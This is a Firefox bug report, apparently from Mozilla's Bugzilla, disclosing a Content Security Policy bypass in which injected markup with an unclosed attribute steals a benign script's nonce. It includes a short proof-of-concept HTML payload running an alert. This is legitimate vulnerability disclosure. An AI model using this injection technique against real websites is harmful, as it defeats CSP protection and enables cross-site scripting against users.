Closed Bug 1761215 Opened 2 years ago Closed 2 years ago

CSP bypass through nonce stealing

Categories

(Core :: DOM: Security, defect, P3)

Product:
Core
Component:
DOM: Security
Version:
Firefox 98
Type:
defect

Tracking

()

Status:
RESOLVED DUPLICATE of bug 1397308

People

(Reporter: gertjan.franken, Unassigned)

References

(Blocks 1 open bug)

Details

(Keywords: sec-low, Whiteboard: [domsecurity-backlog1])

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.83 Safari/537.36

Steps to reproduce:

An attacker can bypass a Content Security Policy defining a nonce if their injected script is able to steal the nonce of a benign script.

PoC: https://gray-gorgeous-parsnip.glitch.me/

Code:

<head>
    <meta http-equiv="Content-Security-Policy" content="script-src 'nonce-abcd'">
</head>
<body>
    <!-- line below is injected by attacker -->
    <script src="data:,alert('malicious script')" x="
    <p>Lorem ipsum</p>
    <script id="benign" nonce="abcd">
      alert('benign script');
    </script>
</body>

I came across this bug while checking out this Chrome bug: https://bugs.chromium.org/p/chromium/issues/detail?id=740615.

Actual results:

The injected script executes by stealing the nonce of a benign script.

Expected results:

The injected script should not be able to execute.

Group: firefox-core-security → core-security
Component: Untriaged → DOM: Security
Product: Firefox → Core
Group: core-security → dom-core-security
Blocks: csp-w3c-3
Severity: -- → S3
Status: UNCONFIRMED → NEW
Ever confirmed: true
Keywords: sec-low
Priority: -- → P3
See Also: → https://bugs.chromium.org/p/chromium/issues/detail?id=740615
Whiteboard: [domsecurity-backlog1]
Group: dom-core-security
Status: NEW → RESOLVED
Closed: 2 years ago
Resolution: --- → DUPLICATE
You need to log in before you can comment on or make changes to this bug.